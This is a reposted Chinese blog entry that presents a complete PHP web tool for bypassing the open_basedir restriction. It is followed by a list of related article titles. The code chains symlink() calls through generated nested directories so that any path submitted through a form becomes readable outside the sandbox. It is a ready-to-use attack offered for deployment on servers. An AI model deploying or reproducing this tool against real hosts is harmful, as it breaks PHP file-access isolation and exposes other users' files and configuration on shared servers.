bypass open_basedir
来源:互联网 发布:松下自动焊编程 编辑:程序博客网 时间:2024/05/22 03:29
在了解symlink() bypass open_basedir 的原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。
<?php/*title: bypass open_basedirauth: eT48blodg:http://blog.csdn.net/et48_sec */header("Conten-type:text/html; charset:udf-8");error_reporting(0);@clearstatcache(); function randStr(){$arr = str_split('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789');shuffle($arr);$arr = array_slice($arr, 0, 6);$str = implode($arr);return $str;}function delTree($dir){ $files = array_diff(scandir($dir), array('.','..')); foreach ($files as $file) { (is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file"); } return rmdir($dir);} function check($filename){}function bypassdir($path){$paths = explode(DIRECTORY_SEPARATOR,$path);$cwd = getcwd();$num = preg_match_all('/\//',$cwd);$tempfn = randStr();$tempdir = "";$expstr = "";$templink = randStr();$explink = randStr();$res = "";mkdir($tempfn);chdir($tempfn);for($i=1; $i<count($paths); $i++){mkdir($paths[$i]);chdir($paths[$i]);}for($i=1; $i<count($paths); $i++){chdir("..");}for($i=1; $i<=$num+1; $i++){mkdir($tempfn);chdir($tempfn);}$tempdir = getcwd();for($i=1; $i<=$num+2; $i++){chdir("..");}for($i=1; $i<=$num+1; $i++){$expstr .="/..";}symlink($tempdir,$templink);symlink($templink.$expstr.$path,$explink);unlink($templink);mkdir($templink);delTree($tempfn);$res = "<a target='_blank' href='./".$explink."'>".$path."</a><br>";return $res;}$res= "";if(!empty($_POST['path'])){$path = $_POST['path'];$res = bypassdir($path);echo $res;die();}?><html><head><title>open_basedir</title></head><body>Titile: bypass open_basedir<br>Auth: eT48<br> Blog: http://blog.csdn.net/et48_sec<br>Open_basedir: <?php echo ini_get('open_basedir'); ?><br>PHPVersion: <?php echo "PHP ".phpversion();?><br><br><form method='post'>path <input id='path' type='text' style='width:450px'><input type='button' onclick='bypassdir()' value='submit' ></form><div id='output'></div><script src="http://www.w3school.com.cn/jquery/jquery-1.11.1.min.js"></script><script>var targeturl = '<?php $_SERVER["REQUEST_URI"] ?>';function send_post(targetdata,callback){$.ajax({url:targeturl,type:'POST',data:targetdata,dataType:'text',success:function(res){callback(res);},error:function(){}})}function bypassdir(){ path = $('#path').val(); if( path!=''){ send_post({ path:path},function(res){ $('#output').append(res);})}}</script></body></html><?php die();?>
0 0
- bypass open_basedir
- symlink() open_basedir bypass 原理分析
- PHP 5.2.12 / 5.3.1 safe_mode / open_basedir Bypass
- PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass
- Bypass FsdFilter
- Bypass RestoreSystem
- bypass ujvc
- ByPass UAC
- bypass更新
- DEP bypass
- open_basedir restriction in effect
- open_basedir的安全隐患
- APACHE open_basedir 多目录
- apache出现open_basedir错误
- vagrant laravel open_basedir
- Bypass Graphics.MeasureString limitations
- bypass HIPS CreateRemoteThread Monitor
- bypass HIPS CreateRemoteThread Monitor
- 使用backbone.js、zepto.js和trigger.io开发HTML5 App
- 【C++ Primer】【学习笔记】【第十章】关联容器之:set类型
- 我想念老好的旧时光
- Protocol Buffer技术详解(语言规范)
- 演化理解 Android 异步加载图片
- bypass open_basedir
- WebView加载方的方式
- ssh连接超时问题解决方案
- php-约瑟夫环-循环链表
- 安卓工具类------->Logcat统一管理类
- selenium问题和方法
- SpringMVC-3 FileUpload-1.2 文件上传
- 无线在对噪声的处理
- Eclipse中修改SVN用户名和密码方法